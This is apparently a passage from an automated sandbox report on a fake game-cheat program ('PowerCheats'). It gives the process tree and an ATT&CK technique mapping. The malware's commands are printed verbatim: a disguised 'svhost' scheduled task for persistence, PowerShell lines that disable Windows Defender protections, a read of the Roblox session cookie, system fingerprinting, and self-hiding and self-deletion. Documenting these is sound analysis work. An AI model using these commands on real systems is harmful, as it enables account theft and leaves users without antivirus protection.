        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5208
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:32
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5240
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5804
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5480
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1092
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:1476
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:2948
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3216
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:6140
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:6136
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1856
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5428
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5352
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1448
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4648
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5304
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5260
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:4116
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5452
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:4416
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3664
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:3996
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5276
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2944
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3196
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:3608
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1596
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:4876
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4688
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:512
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:788
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:4672
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:904
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5432
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1384
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5972
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1232
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:1372
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1480
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5956
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5164
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:764
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5444
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3900
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1092
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5368
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4892
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:6136
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4576
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5428
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4000
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2064
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5988
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3000
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3400
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5064
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5220
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5276
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3608
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:3844
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4308
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4844
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:3612
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:3232
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:2968
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:208
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:1252
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:5892
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:5972
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        
        PID:4208
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4440
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:2160
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:612
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5360
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:6076
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:4984
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:4860
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5948
      - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
        6⤵
        
        PID:2052
        
        C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5444

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5632

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5824

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
- Loads dropped DLL
PID:4012

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5860

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3432

C:\Users\Admin\Downloads\PowerCheats.exe
"C:\Users\Admin\Downloads\PowerCheats.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1968
- C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe
  "C:\Users\Admin\Downloads\PowerCheat\PowerCheatEmuHider.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4248
- - C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe
    "C:\Users\Admin\AppData\Local\Temp\PowerCheatEmuHider.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:1316
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
      4⤵
      PID:2488
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:1976
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
      4⤵
      PID:4280
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5024
  - - C:\Windows\SYSTEM32\CMD.exe
      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST & exit
      4⤵
      PID:5840
    - - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo -1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\firefox.exe" /RL HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:5308

C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe
"C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6020
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:776
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe"
  2⤵
  - Views/modifies file attributes
  PID:5968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:5308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3896
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Loads dropped DLL
  PID:4416
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Loads dropped DLL
  PID:5132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  PID:5740
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1620
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\PowerCheat\HiderLdPlayer.exe" && pause
  2⤵
  PID:5040
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:5812

C:\Windows\conshost.exe
C:\Windows\conshost.exe
1⤵
- Executes dropped EXE
PID:5612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery